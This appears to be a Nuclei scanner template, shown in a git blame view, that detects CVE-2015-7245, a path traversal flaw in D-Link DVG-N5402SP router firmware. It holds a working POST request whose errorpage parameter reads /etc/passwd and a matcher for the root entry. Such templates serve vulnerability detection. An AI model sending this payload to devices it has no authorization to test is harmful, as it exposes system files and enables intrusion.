2022-08-16 02:32:51 +00:00
id : CVE-2015-7245
info :
2022-10-10 19:22:59 +00:00
name : D-Link DVG-N5402SP - Local File Inclusion
2022-08-16 02:32:51 +00:00
author : 0x_Akoko
severity : high
2022-09-02 06:03:10 +00:00
description : |
2022-10-10 19:22:59 +00:00
D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
2022-09-02 05:50:32 +00:00
reference :
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-16 02:32:51 +00:00
classification :
2022-09-04 15:21:50 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-16 02:32:51 +00:00
cve-id : CVE-2015-7245
2022-09-04 15:21:50 +00:00
cwe-id : CWE-22
2024-05-31 19:23:20 +00:00
epss-score : 0.96378
epss-percentile : 0.99562
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : d-link
product : dvg-n5402sp_firmware
2024-01-14 09:21:50 +00:00
tags : cve2015,cve,dlink,lfi,packetstorm,edb,d-link
2022-08-16 02:32:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-02 06:03:10 +00:00
- raw :
- |
POST /cgibin/webproc HTTP/1.1
Host : {{Hostname}}
2022-08-16 02:32:51 +00:00
2022-09-02 06:03:10 +00:00
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
2022-08-16 02:32:51 +00:00
matchers :
- type : regex
2022-09-02 06:03:10 +00:00
part : body
2022-08-16 02:32:51 +00:00
regex :
- "root:.*:0:0:"
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950